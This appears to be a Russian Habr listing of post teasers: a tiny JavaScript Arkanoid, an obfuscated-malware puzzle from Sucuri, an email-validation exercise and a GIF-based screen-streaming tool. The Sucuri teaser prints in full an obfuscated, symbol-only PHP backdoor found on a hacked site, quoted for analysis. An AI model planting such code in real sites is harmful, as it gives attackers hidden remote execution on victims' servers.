Наблюдая за тем, как люди в 30 строк джаваскрипта умещают excel и змейку, я решил не отставать от  ... 
										
										
										Наблюдая за тем, как люди в 30 строк джаваскрипта умещают excel и змейку, я решил не отставать от прогресса, и создать что-нибудь подобное.
Итак, дамы и господа — 30ти строчный арканоид на чистом JS.

 Читать дальше →
										
										Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его  ... 
										
										
										Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
 Узнать подробности
										
										
Представьте на минутку, что вы — недавно принятый на работу программист, которому предстоит работать с популярной системой управления обучением (LMS) Hot4Learning. Ваш предшественник когда-то поработал над добавлением к системе возможности отправки email — для того, чтобы любой пользователь в школе мог отправить другому пользователю электронное письмо с помощью веб-интерфейса. Но, увы, судьба оказалась к нему неблагосклонна — его сбил автобус, и он так никогда и не завершил свой magnum opus, свою лебединую песню. Ваша задача — довести его дело до конца, добавив функцию валидации введенного email — чтобы можно было быть уверенным, что письма отправляются только в том случае, когда в качестве адресата вводится правильный адрес, привязанный к школе.
Приведем конкретный пример: допустим, Боб — студент в Университете Макгилла, и он должен иметь возможность отправить письмо на любой валидный адрес 
@mail.mcgill.ca или 
@mcgill.ca. Если адрес его подружки Джейн выглядит как 
jane.smith@mail.mcgill.ca, то тогда Боб имеет полное право отправлять на него письма. В другом случае — скажем, если ее адрес 
jane.smith@mail.ru — он, понятное дело, права на это не имеет, как и на отсылку писем на адрес 
thisisnotavalidemail@mail.mcgill.ca.
Итак, ваша задача — реализовать эту возможность; при этом предполагается, что у вас есть список валидных адресов почты для конкретного учебного заведения.
 Читать дальше →
										
 
										
										
										Полгода назад я написал пост о придуманной мною технологии программирования ( habrahabr.ru/post/ ... 
										
										
										
Полгода назад на Хабре излагалась идея GIF-сокетов — коммуникаций в реальном времени, используя анимированный GIF в качестве транспорта.
Идея в том, что в формате анимированного GIF'а не указывается количество фреймов, так что после отображения картинки браузер ждёт новых фреймов с сервера до тех пор, пока не получит сигнальные биты о конце файла. Другими словами, сервер легко может пушить в браузер сообщения по открытому каналу в GIF.
Сегодня на гитхабе опубликована программка vnc-over-gif, которая элегантно использует этот принцип. Программа снимает скриншоты экрана и транслирует их через анимированный gif.
 Читать дальше →